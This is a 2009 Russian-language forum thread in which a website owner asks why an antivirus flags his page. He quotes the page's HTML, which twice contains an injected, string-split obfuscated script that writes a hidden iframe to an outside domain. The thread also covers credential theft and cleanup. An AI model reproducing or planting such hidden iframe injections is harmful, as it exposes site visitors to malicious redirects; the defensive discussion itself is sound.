dthnth 3 Опубликовано 29 июня, 2009 Share Опубликовано 29 июня, 2009 (изменено) Добрый день. Прошу прощения, если тема не в том разделе. вобщем такие дела : есть сайт, написанный на html и джава скрипты на нем созданы в программе UltraMenu, - открывающиеся менюшки для подразделов. с 25-го числа, как написано на вирус листе Время детектирования 25 июн 2009 12:13 MSK Время выпуска обновления 25 июн 2009 16:33 MSK данные скрипты почему то определяются Касперским как вредоносные. Почему они стали вредоносными ? вот начало index.htm, который определяется как вирус: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>ЦЕНТР ЗАЩИТЫ СТРОИТЕЛЬНЫХ КОНСТРУКЦИЙ</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <link rel="stylesheet" type="text/css" href="CSS/limb.css"> <script type="text/javascript" language="JavaScript1.2" src="JS/um_menu.js"></script> <link href="CSS/menu.css" rel="stylesheet" type="text/css"> </head> <body ><script>document.write("<"+"i"+"f"+"ram"+"e sr"+"c=\"h"+"t"+"tp"+":"+"/"+"/tr"+"ught"+""+"s"+"a.c"+"o"+"m/\" wid"+"th=1 he"+"ight"+"="+"2></if"+"r"+"a"+""+"me>");</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-32645524-1");pageTracker._trackPageview();} catch(err) {}</script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-7623457-2"); pageTracker._trackPageview(); } catch(err) {}</script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-9224876-1"); pageTracker._trackPageview(); } catch(err) {}</script> что такого вирусного , похожего на поведение Trojan-Clicker в данном коде ? до 25-го июня таких проблем не было. ---------------------------- далее обнаружили мы все таки что это : ><script>document.write("<"+"i"+"f"+"ram"+"e sr"+"c=\"h"+"t"+"tp"+":"+"/"+"/tr"+"ught"+""+"s"+"a.c"+"o"+"m/\" wid"+"th=1 he"+"ight"+"="+"2></if"+"r"+"a"+""+"me>");</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-32645524-1");pageTracker._trackPageview();} catch(err) {}</script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-7623457-2"); pageTracker._trackPageview(); } catch(err) {}</script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-9224876-1"); pageTracker._trackPageview(); } catch(err) {}</script> не наше и удалено было из index однако вопрос, каким образом это могло прицепиться к странице ? к которой нет доступа ни у кого кроме хостера ? Изменено 29 июня, 2009 пользователем dthnth Цитата Ссылка на сообщение Поделиться на другие сайты
ROME'D'ROS 18 Опубликовано 29 июня, 2009 Share Опубликовано 29 июня, 2009 Отправьте этот скрипт на newvirus@kaspersky.com ,с пометкой "Ложное срабатывание". Цитата Ссылка на сообщение Поделиться на другие сайты
Самогонщик 374 Опубликовано 29 июня, 2009 Share Опубликовано 29 июня, 2009 Здравствуйте, Почему вырешили, что это ложное срабатывание? В коде страничке вставлен зловредный зашифрованный код, который ведет на сайт _http://trughtsa.com, который в свою очередь ведет на porno.com Сайт действительно заражен Цитата Ссылка на сообщение Поделиться на другие сайты
ROME'D'ROS 18 Опубликовано 29 июня, 2009 Share Опубликовано 29 июня, 2009 ЦитатаЗдравствуйте, Почему вырешили, что это ложное срабатывание? В коде страничке вставлен зловредный зашифрованный код, который ведет на сайт _http://trughtsa.com, который в свою очередь ведет на porno.com Сайт действительно заражен Вот видите,оказалось заражён. Цитата Ссылка на сообщение Поделиться на другие сайты
akoK 138 Опубликовано 29 июня, 2009 Share Опубликовано 29 июня, 2009 ROME'D'ROS, сейчас сайт недоступен. Цитата Ссылка на сообщение Поделиться на другие сайты
dthnth 3 Опубликовано 29 июня, 2009 Автор Share Опубликовано 29 июня, 2009 (изменено) да, прошу прощения, действительно мы не правы, срабатывание верное ( вот если бы не касперский, так бы мы были и не в курсе. ни нод, ни авира, ни дрвеб не реагируют на это. разработчик глядя на код скрипта , увидел лишнее после постинга моего на этом форуме. остается вопрос, как можно было изменить код файла htm , лежащего на сервере провайдера, к которому ни у кого нет доступа кроме провайдера и нас, понимаю , что это вопрос не для данного форума. прошу великодушно простить. просто мы немного в афиге и шоке, ибо скрипты менюшек раскрывающихся , вообще говоря не способны быть переделанными извне в возможность редактирования htm файла на хосте. хотя могу ошибаться.. Изменено 29 июня, 2009 пользователем dthnth Цитата Ссылка на сообщение Поделиться на другие сайты
Tishkin Andrew 3 Опубликовано 29 июня, 2009 Share Опубликовано 29 июня, 2009 (изменено) остается вопрос, как можно было изменить код файла htm , лежащего на сервере провайдера, к которому ни у кого нет доступа кроме провайдера и нас, Вчера пришло письмо от Google-а, что на моём сайте две страницы заражены. Я тоже в лёгком шоке оказался... Вредоносный скрипт из страниц удалил, в кабинете веб-мастера на гугле запросил повторное сканирование сайта, и послал письмо хостеру Получил ответ: Прочитайте наш FAQ насчет вирусов на сайте и будьте осторожны на будущее. В FAQ написано вот что: В: Когда я открываю свой сайт в браузере, мой антивирус выдает сообщение о том, что на нем найден вирус (вирус на сайте, вредоносный код). Что мне делать?О: На ваш домашний компьютер попала троянская программа, которая украла данные для доступа к вашему сайту и заразила ваш сайт. Вам следует сделать следующее: 1. Про сканировать ваш домашний ПК антивирусом со свежими антивирусными базами. 2. Изменить пароль от cPanel (функция "Изменить пароль", в панели управления cPanel). 3. Закачать все файлы сайта заново. 4. Не сохранять пароль для доступа к сайту в кеше ftp клиентов, браузеров. Я почти уверен, что никакой троян не мог у меня из FTP-клиента Filezilla выдернуть логин и пароль KIS бы не позволил, хотя всё может быть, но мне слабо верится в это Изменено 29 июня, 2009 пользователем Tishkin Andrew Цитата Ссылка на сообщение Поделиться на другие сайты
dthnth 3 Опубликовано 29 июня, 2009 Автор Share Опубликовано 29 июня, 2009 ну вот и у нас, на всех компьютерах, имеющих доступ к фтп данного сайта - стоит касперский , и никакой из них не заражен, правда у нас не кис стоит, а kav, но он тоже исправно ругается на заражение, как могло пройти заражение и изменение файла - интересно, ради полумеры временной , мы изменили атрибут файла на сервере так, что бы невозможно было изменять. ждем повторения банкета , грубо говоря ) Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.